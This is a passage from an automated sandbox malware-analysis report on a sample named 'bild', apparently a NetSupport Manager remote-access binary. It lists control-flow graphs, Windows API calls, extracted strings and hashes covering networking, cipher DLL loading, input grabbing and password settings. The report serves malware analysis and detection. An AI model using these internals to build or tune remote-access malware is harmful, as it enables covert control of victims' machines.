                                                                                          • Instruction Fuzzy Hash: 8F51BF71644300EFDB10EF6DCCC5B5A73B8AB89316F120915E906D7A81DB70E986CF69

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2717 6c5d98d0-6c5d9932 2718 6c5d9934-6c5d9955 call 6c5d30a0 call 6c5f28e1 2717->2718 2719 6c5d9956-6c5d995e 2717->2719 2721 6c5d9ac5-6c5d9acc 2719->2721 2722 6c5d9964-6c5d9979 call 6c5f28f0 2719->2722 2724 6c5d9ace-6c5d9adb 2721->2724 2725 6c5d9b19-6c5d9b1d 2721->2725 2722->2721 2735 6c5d997f-6c5d9994 call 6c5f4330 2722->2735 2728 6c5d9add-6c5d9af6 wsprintfA 2724->2728 2729 6c5d9af8-6c5d9b07 wsprintfA 2724->2729 2730 6c5d9b1f-6c5d9b26 2725->2730 2731 6c5d9b4b-6c5d9b70 GetTickCount InterlockedExchange EnterCriticalSection 2725->2731 2736 6c5d9b0a-6c5d9b16 call 6c5d52b0 2728->2736 2729->2736 2730->2731 2737 6c5d9b28-6c5d9b41 call 6c5d77b0 2730->2737 2733 6c5d9b9c-6c5d9ba1 2731->2733 2734 6c5d9b72-6c5d9b9b LeaveCriticalSection call 6c5d30a0 call 6c5f28e1 2731->2734 2741 6c5d9bfb-6c5d9c05 2733->2741 2742 6c5d9ba3-6c5d9bd0 call 6c5d4dd0 2733->2742 2735->2721 2753 6c5d999a-6c5d99af call 6c5f28f0 2735->2753 2736->2725 2737->2731 2758 6c5d9b43-6c5d9b45 2737->2758 2749 6c5d9c3b-6c5d9c47 2741->2749 2750 6c5d9c07-6c5d9c17 2741->2750 2763 6c5d9d4b-6c5d9d6c LeaveCriticalSection call 6c5e77e0 2742->2763 2764 6c5d9bd6-6c5d9bf6 WSAGetLastError call 6c5d30a0 2742->2764 2754 6c5d9c50-6c5d9c5a 2749->2754 2756 6c5d9c19-6c5d9c1d 2750->2756 2757 6c5d9c20-6c5d9c22 2750->2757 2753->2721 2777 6c5d99b5-6c5d99f1 2753->2777 2765 6c5d9d2e-6c5d9d3b call 6c5d30a0 2754->2765 2766 6c5d9c60-6c5d9c65 2754->2766 2756->2757 2759 6c5d9c1f 2756->2759 2757->2749 2760 6c5d9c24-6c5d9c36 call 6c5d46c0 2757->2760 2758->2731 2759->2757 2760->2749 2784 6c5d9d6e-6c5d9d72 InterlockedIncrement 2763->2784 2785 6c5d9d78-6c5d9d8a call 6c5f28e1 2763->2785 2764->2763 2782 6c5d9d45 2765->2782 2772 6c5d9c67-6c5d9c6b 2766->2772 2773 6c5d9c71-6c5d9c9a send 2766->2773 2772->2765 2772->2773 2774 6c5d9c9c-6c5d9c9f 2773->2774 2775 6c5d9cf1-6c5d9d0f call 6c5d30a0 2773->2775 2780 6c5d9cbe-6c5d9cce WSAGetLastError 2774->2780 2781 6c5d9ca1-6c5d9cac 2774->2781 2775->2782 2783 6c5d99f7-6c5d99ff 2777->2783 2792 6c5d9d11-6c5d9d2c call 6c5d30a0 2780->2792 2793 6c5d9cd0-6c5d9ce9 timeGetTime Sleep 2780->2793 2781->2782 2788 6c5d9cb2-6c5d9cbc 2781->2788 2782->2763 2789 6c5d9a05-6c5d9a08 2783->2789 2790 6c5d9aa3-6c5d9ac2 call 6c5d30a0 2783->2790 2784->2785 2788->2793 2797 6c5d9a0e 2789->2797 2798 6c5d9a0a-6c5d9a0c 2789->2798 2790->2721 2792->2782 2793->2754 2796 6c5d9cef 2793->2796 2796->2782 2802 6c5d9a14-6c5d9a1d 2797->2802 2798->2802 2803 6c5d9a8d-6c5d9a8e 2802->2803 2804 6c5d9a1f-6c5d9a22 2802->2804 2803->2790 2805 6c5d9a24 2804->2805 2806 6c5d9a26-6c5d9a35 2804->2806 2805->2806 2807 6c5d9a37-6c5d9a3a 2806->2807 2808 6c5d9a90-6c5d9a93 2806->2808 2809 6c5d9a3c 2807->2809 2810 6c5d9a3e-6c5d9a4d 2807->2810 2811 6c5d9a9d 2808->2811 2809->2810 2812 6c5d9a4f-6c5d9a52 2810->2812 2813 6c5d9a95-6c5d9a98 2810->2813 2811->2790 2814 6c5d9a54 2812->2814 2815 6c5d9a56-6c5d9a65 2812->2815 2813->2811 2814->2815 2816 6c5d9a9a 2815->2816 2817 6c5d9a67-6c5d9a6a 2815->2817 2816->2811 2818 6c5d9a6c 2817->2818 2819 6c5d9a6e-6c5d9a85 2817->2819 2818->2819 2819->2783 2820 6c5d9a8b 2819->2820 2820->2790
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _strncmp
                                                                                          • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                          • API String ID: 909875538-2848211065
                                                                                          • Opcode ID: fb52e782a14474a73dab20392db70733aa14038a2242b7f7af2842cf1d96cfa5
                                                                                          • Instruction ID: dba97fcb907ed3845e0f623ca9bd7ef6d1fef07121cf68773d2a8783451612ab
                                                                                          • Opcode Fuzzy Hash: fb52e782a14474a73dab20392db70733aa14038a2242b7f7af2842cf1d96cfa5
                                                                                          • Instruction Fuzzy Hash: B7D12271A053199FDB20CF6CCCA1BD9B774AF4A308F0641D9D8099BA41DB31AD89CF89

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2821 110285f0-1102860d 2822 11028613-11028642 2821->2822 2823 11028cd8-11028cdf 2821->2823 2824 110286d0-11028718 GetModuleFileNameA call 111631f0 call 11163fed 2822->2824 2825 11028648-1102864e 2822->2825 2826 11028cf1-11028cf5 2823->2826 2827 11028ce1-11028cea 2823->2827 2841 1102871d 2824->2841 2829 11028650-11028658 2825->2829 2831 11028cf7-11028d09 call 11161d01 2826->2831 2832 11028d0a-11028d1e call 11161d01 2826->2832 2827->2826 2830 11028cec 2827->2830 2829->2829 2835 1102865a-11028660 2829->2835 2830->2826 2839 11028663-11028668 2835->2839 2839->2839 2842 1102866a-11028674 2839->2842 2843 11028720-1102872a 2841->2843 2844 11028691-11028697 2842->2844 2845 11028676-1102867d 2842->2845 2847 11028730-11028733 2843->2847 2848 11028ccf-11028cd7 2843->2848 2846 11028698-1102869e 2844->2846 2849 11028680-11028686 2845->2849 2846->2846 2850 110286a0-110286ce call 11163fed 2846->2850 2847->2848 2851 11028739-11028747 call 11026890 2847->2851 2848->2823 2849->2849 2852 11028688-1102868e 2849->2852 2850->2843 2857 11028c55-11028c6a call 11163db7 2851->2857 2858 1102874d-11028760 call 11162de7 2851->2858 2852->2844 2857->2848 2865 11028c70-11028cca 2857->2865 2863 11028762-11028765 2858->2863 2864 1102876b-11028793 call 11026700 call 11026890 2858->2864 2863->2857 2863->2864 2864->2857 2870 11028799-110287b6 call 11026980 call 11026890 2864->2870 2865->2848 2875 11028bc5-11028bcc 2870->2875 2876 110287bc 2870->2876 2877 11028bf2-11028bf9 2875->2877 2878 11028bce-11028bd1 2875->2878 2879 110287c0-110287e0 call 11026700 2876->2879 2881 11028c11-11028c18 2877->2881 2882 11028bfb-11028c01 2877->2882 2878->2877 2880 11028bd3-11028bda 2878->2880 2889 110287e2-110287e5 2879->2889 2890 11028816-11028819 2879->2890 2884 11028be0-11028bf0 2880->2884 2886 11028c1a-11028c25 2881->2886 2887 11028c28-11028c2f 2881->2887 2885 11028c07-11028c0f 2882->2885 2884->2877 2884->2884 2885->2881 2885->2885 2886->2887 2891 11028c31-11028c3b 2887->2891 2892 11028c3e-11028c45 2887->2892 2893 110287e7-110287ee 2889->2893 2894 110287fe-11028801 2889->2894 2896 11028bae-11028bbf call 11026890 2890->2896 2897 1102881f-11028832 call 11164150 2890->2897 2891->2892 2892->2857 2895 11028c47-11028c52 2892->2895 2898 110287f4-110287fc 2893->2898 2894->2896 2899 11028807-11028811 2894->2899 2895->2857 2896->2875 2896->2879 2897->2896 2904 11028838-11028854 call 111646ce 2897->2904 2898->2894 2898->2898 2899->2896 2907 11028856-1102885c 2904->2907 2908 1102886f-11028885 call 111646ce 2904->2908 2910 11028860-11028868 2907->2910 2913 11028887-1102888d 2908->2913 2914 1102889f-110288b5 call 111646ce 2908->2914 2910->2910 2912 1102886a 2910->2912 2912->2896 2915 11028890-11028898 2913->2915 2919 110288b7-110288bd 2914->2919 2920 110288cf-110288e5 call 111646ce 2914->2920 2915->2915 2917 1102889a 2915->2917 2917->2896 2921 110288c0-110288c8 2919->2921 2925 110288e7-110288ed 2920->2925 2926 110288ff-11028915 call 111646ce 2920->2926 2921->2921 2923 110288ca 2921->2923 2923->2896 2928 110288f0-110288f8 2925->2928 2931 11028917-1102891d 2926->2931 2932 1102892f-11028945 call 111646ce 2926->2932 2928->2928 2929 110288fa 2928->2929 2929->2896 2933 11028920-11028928 2931->2933 2937 11028947-1102894d 2932->2937 2938 1102895f-11028975 call 111646ce 2932->2938 2933->2933 2935 1102892a 2933->2935 2935->2896 2939 11028950-11028958 2937->2939 2943 11028977-1102897d 2938->2943 2944 1102898f-110289a5 call 111646ce 2938->2944 2939->2939 2941 1102895a 2939->2941 2941->2896 2945 11028980-11028988 2943->2945 2949 110289a7-110289ad 2944->2949 2950 110289bf-110289d5 call 111646ce 2944->2950 2945->2945 2947 1102898a 2945->2947 2947->2896 2951 110289b0-110289b8 2949->2951 2955 110289d7-110289dd 2950->2955 2956 110289ef-11028a05 call 111646ce 2950->2956 2951->2951 2953 110289ba 2951->2953 2953->2896 2958 110289e0-110289e8 2955->2958 2961 11028a07-11028a0d 2956->2961 2962 11028a1f-11028a35 call 111646ce 2956->2962 2958->2958 2960 110289ea 2958->2960 2960->2896 2963 11028a10-11028a18 2961->2963 2967 11028a37-11028a3d 2962->2967 2968 11028a4f-11028a65 call 111646ce 2962->2968 2963->2963 2965 11028a1a 2963->2965 2965->2896 2969 11028a40-11028a48 2967->2969 2973 11028a86-11028a9c call 111646ce 2968->2973 2974 11028a67-11028a6d 2968->2974 2969->2969 2971 11028a4a 2969->2971 2971->2896 2979 11028ab3-11028ac9 call 111646ce 2973->2979 2980 11028a9e 2973->2980 2976 11028a77-11028a7f 2974->2976 2976->2976 2977 11028a81 2976->2977 2977->2896 2985 11028ae0-11028af6 call 111646ce 2979->2985 2986 11028acb 2979->2986 2981 11028aa4-11028aac 2980->2981 2981->2981 2983 11028aae 2981->2983 2983->2896 2991 11028b17-11028b2d call 111646ce 2985->2991 2992 11028af8-11028afe 2985->2992 2987 11028ad1-11028ad9 2986->2987 2987->2987 2989 11028adb 2987->2989 2989->2896 2997 11028b4f-11028b65 call 111646ce 2991->2997 2998 11028b2f-11028b3f 2991->2998 2993 11028b08-11028b10 2992->2993 2993->2993 2995 11028b12 2993->2995 2995->2896 3003 11028b67-11028b6d 2997->3003 3004 11028b7c-11028b92 call 111646ce 2997->3004 2999 11028b40-11028b48 2998->2999 2999->2999 3001 11028b4a 2999->3001 3001->2896 3006 11028b70-11028b78 3003->3006 3004->2896 3009 11028b94-11028b9a 3004->3009 3006->3006 3008 11028b7a 3006->3008 3008->2896 3010 11028ba4-11028bac 3009->3010 3010->2896 3010->3010
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6E621370,?,0000001A), ref: 110286DD
                                                                                          • _strrchr.LIBCMT ref: 110286EC
                                                                                            • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileModuleName__stricmp_l_strrchr
                                                                                          • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                          • API String ID: 1609618855-357498123
                                                                                          • Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                          • Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
                                                                                          • Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                          • Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 6C5E6BD5
                                                                                          • GetTickCount.KERNEL32 ref: 6C5E6C26
                                                                                          • Sleep.KERNEL32(00000064), ref: 6C5E6C5B
                                                                                            • Part of subcall function 6C5E6940: GetTickCount.KERNEL32 ref: 6C5E6950
                                                                                          • WaitForSingleObject.KERNEL32(00000300,?), ref: 6C5E6C7C
                                                                                          • _memmove.LIBCMT ref: 6C5E6C93
                                                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6C5E6CB4
                                                                                          • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6C5E6CD9
                                                                                          • GetTickCount.KERNEL32 ref: 6C5E6CEC
                                                                                          • _calloc.LIBCMT ref: 6C5E6D76
                                                                                          • GetTickCount.KERNEL32 ref: 6C5E6DF3
                                                                                          • InterlockedExchange.KERNEL32(03682F3A,00000000), ref: 6C5E6E01
                                                                                          • _calloc.LIBCMT ref: 6C5E6E33
                                                                                          • _memmove.LIBCMT ref: 6C5E6E47
                                                                                          • InterlockedDecrement.KERNEL32(03682EE2), ref: 6C5E6EC3
                                                                                          • SetEvent.KERNEL32(00000308), ref: 6C5E6ECF
                                                                                          • _memmove.LIBCMT ref: 6C5E6EF4
                                                                                          • GetTickCount.KERNEL32 ref: 6C5E6F4F
                                                                                          • InterlockedExchange.KERNEL32(03682E82,-6C61A188), ref: 6C5E6F60
                                                                                          Strings
                                                                                          • ResumeTimeout, xrefs: 6C5E6BBA
                                                                                          • ProcessMessage returned FALSE. Terminating connection, xrefs: 6C5E6F25
                                                                                          • httprecv, xrefs: 6C5E6BDD
                                                                                          • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C5E6E62
                                                                                          • ReadMessage returned FALSE. Terminating connection, xrefs: 6C5E6F3A
                                                                                          • FALSE, xrefs: 6C5E6E67
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                          • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                          • API String ID: 1449423504-919941520
                                                                                          • Opcode ID: 3364a4fd5ee0db7c7927f711757876820ead3de70ba1b450b830d21f000c2d0e
                                                                                          • Instruction ID: adf0c25f8261296612d28c6f0cec855ec173c374a3f15780385c7ff393ddaeb6
                                                                                          • Opcode Fuzzy Hash: 3364a4fd5ee0db7c7927f711757876820ead3de70ba1b450b830d21f000c2d0e
                                                                                          • Instruction Fuzzy Hash: F9B1C1B1D00258DFDF20DB69CD85BDA73B4EB4834AF00449AE649E7A40DBB49AC4CF95
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 110867EC
                                                                                          • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                          • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                          • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                          • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                          • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                          • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                          • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                          • API String ID: 2201880244-3035937465
                                                                                          • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                          • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                          • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                          • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50
                                                                                          APIs
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                          • API String ID: 3535843008-2062829784
                                                                                          • Opcode ID: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
                                                                                          • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                          • Opcode Fuzzy Hash: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
                                                                                          • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51
                                                                                          APIs
                                                                                            • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                            • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                            • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                          • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                          • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                          • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                          • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                          • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                          • _strncpy.LIBCMT ref: 11074B68
                                                                                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                          • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                          • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                          • std::exception::exception.LIBCMT ref: 11074D68
                                                                                          • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                          • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                          • API String ID: 703120326-1497550179
                                                                                          • Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                          • Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
                                                                                          • Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                          • Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65
                                                                                          APIs
                                                                                            • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                            • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                            • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                          • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                          • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
